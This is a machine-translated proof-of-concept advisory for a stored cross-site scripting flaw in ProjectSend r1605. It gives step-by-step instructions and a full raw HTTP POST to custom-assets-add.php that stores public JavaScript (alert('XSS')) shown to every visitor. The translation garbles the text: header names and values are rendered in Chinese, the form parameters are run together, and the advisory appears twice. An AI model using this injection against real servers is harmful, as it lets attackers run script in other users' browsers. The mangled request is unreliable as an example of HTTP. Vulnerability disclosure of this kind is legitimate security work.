利用标题: Projectsent r1605-存储的XSS
Application: ProjectsEND
版本: R1605
BUGS:存储的XSS
Technology: php
供应商URL: https://www.projectsend.org/
软件link: https://www.projectsend.org/
发现的日期: 11-06-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
1。登录为管理员
2。转到自定义html/css/js(http://localhost/custom-assets.php)
3。转到新JS(http://localhost/custom-assets-add.php?language=js)
4。将内容设置为警报('XSS');并公开
5。保存
6。转到http://localhost(注销)
payload:警报('xss')
post /custom-assets-add.php http /1.1
HOST: LOCALHOST
内容长度: 171
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/custom-assets-add.php?language=js
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: log_download_started=false; phpsessID=7J8G8U9T7KHB259CI4FVAREG2L
连接:关闭
csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dablanguage=jstitle=testcontent=alert%28%22XSS%22%29%3Benabled=onlocation=publicposition=head
Application: ProjectsEND
版本: R1605
BUGS:存储的XSS
Technology: php
供应商URL: https://www.projectsend.org/
软件link: https://www.projectsend.org/
发现的日期: 11-06-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
1。登录为管理员
2。转到自定义html/css/js(http://localhost/custom-assets.php)
3。转到新JS(http://localhost/custom-assets-add.php?language=js)
4。将内容设置为警报('XSS');并公开
5。保存
6。转到http://localhost(注销)
payload:警报('xss')
post /custom-assets-add.php http /1.1
HOST: LOCALHOST
内容长度: 171
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/custom-assets-add.php?language=js
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: log_download_started=false; phpsessID=7J8G8U9T7KHB259CI4FVAREG2L
连接:关闭
csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dablanguage=jstitle=testcontent=alert%28%22XSS%22%29%3Benabled=onlocation=publicposition=head